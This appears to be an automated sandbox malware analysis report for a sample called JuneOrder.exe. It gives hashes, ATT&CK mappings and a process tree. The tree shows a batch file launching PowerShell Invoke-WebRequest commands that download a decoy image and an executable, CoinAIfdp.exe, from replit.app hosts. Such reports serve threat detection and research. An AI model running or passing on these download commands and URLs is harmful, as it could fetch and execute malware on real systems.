106dc2ab6da5448b983e66c7c6850533006abf9176eb6ee3d58e101b83d8d47f

General

Target

JuneOrder.exe
Size

510KB
MD5

2b19d65705eee546214513fb65948b2a
SHA1

20b6c01b9f20047fc9f3bf9baa14b5046cbc0012
SHA256

106dc2ab6da5448b983e66c7c6850533006abf9176eb6ee3d58e101b83d8d47f
SHA512

183bb9331b20d2f4118820bd372e5202220e29cfea2d5ae5fedd8d1a9bfaf548a9399aa604950553948899a1d75658e64480c660ce7f83bb89cd566e1385eb72
SSDEEP

6144:+ldk1cWQRNTB2/Me7eC9g1HGnKBvYfew0PjZmwvhhlJdZBuUwXtgZcJeJ:+cv0NTg/XrRnKBwfOM0dayZKeJ

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2460	powershell.exe
1448	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JuneOrder.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2460	powershell.exe
1448	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	1448	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1872 wrote to memory of 2344	1872	JuneOrder.exe	31
PID 1872 wrote to memory of 2344	1872	JuneOrder.exe	31
PID 1872 wrote to memory of 2344	1872	JuneOrder.exe	31
PID 1872 wrote to memory of 2344	1872	JuneOrder.exe	31
PID 2344 wrote to memory of 2460	2344	cmd.exe	33
PID 2344 wrote to memory of 2460	2344	cmd.exe	33
PID 2344 wrote to memory of 2460	2344	cmd.exe	33
PID 2344 wrote to memory of 1448	2344	cmd.exe	34
PID 2344 wrote to memory of 1448	2344	cmd.exe	34
PID 2344 wrote to memory of 1448	2344	cmd.exe	34

C:\Users\Admin\AppData\Local\Temp\JuneOrder.exe
"C:\Users\Admin\AppData\Local\Temp\JuneOrder.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1872
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D5D5.tmp\D5D6.tmp\D5D7.bat C:\Users\Admin\AppData\Local\Temp\JuneOrder.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1448

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\D5D5.tmp\D5D6.tmp\D5D7.bat

Filesize
329B

MD5
91f265d84f2c400c6f731982fbc1dd26

SHA1
6d175c5694e58dd4d0ea55e77679de57105c6b0d

SHA256
ded4d515b9bcfdd3221da6239dc2fac799b129712ffcc1f92722a2c508a0c173

SHA512
4ea36db68fa533eb1b55d365abf400c9fc6cca8968b1950da2c02fd56f72b7a031583c8c730a4003354f2b010a879e94d15b80a3595e50581c72ad25c75bb67b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
20c6cdcdf68be0eed4cefe758ca63139

SHA1
7f0da5c19997a49d17f7a188499710e86ff04ada

SHA256
213ee63e372446f2f65d29e95a28fe887acaa1e8f80ad7c035a08ae9607d4937

SHA512
6ae6c9fe5806c85265543bf979ef2c7e0151a3046028562c21f0d417b41278a975c2872421666b4e3a926c0410754d08bd3332721850ba0db3a082c90df30c46

Download Submit
memory/1448-19-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/1448-20-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2460-6-0x000007FEF645E000-0x000007FEF645F000-memory.dmp

Filesize
4KB

Download
memory/2460-7-0x000000001B7A0000-0x000000001BA82000-memory.dmp

Filesize
2.9MB

Download
memory/2460-8-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/2460-9-0x000007FEF61A0000-0x000007FEF6B3D000-memory.dmp

Filesize
9.6MB

Download
memory/2460-11-0x0000000002DCB000-0x0000000002E32000-memory.dmp

Filesize
412KB

Download
memory/2460-13-0x000007FEF61A0000-0x000007FEF6B3D000-memory.dmp

Filesize
9.6MB

Download
memory/2460-12-0x000007FEF61A0000-0x000007FEF6B3D000-memory.dmp

Filesize
9.6MB

Download
memory/2460-10-0x0000000002DC4000-0x0000000002DC7000-memory.dmp

Filesize
12KB

Download

Analysis

Sharing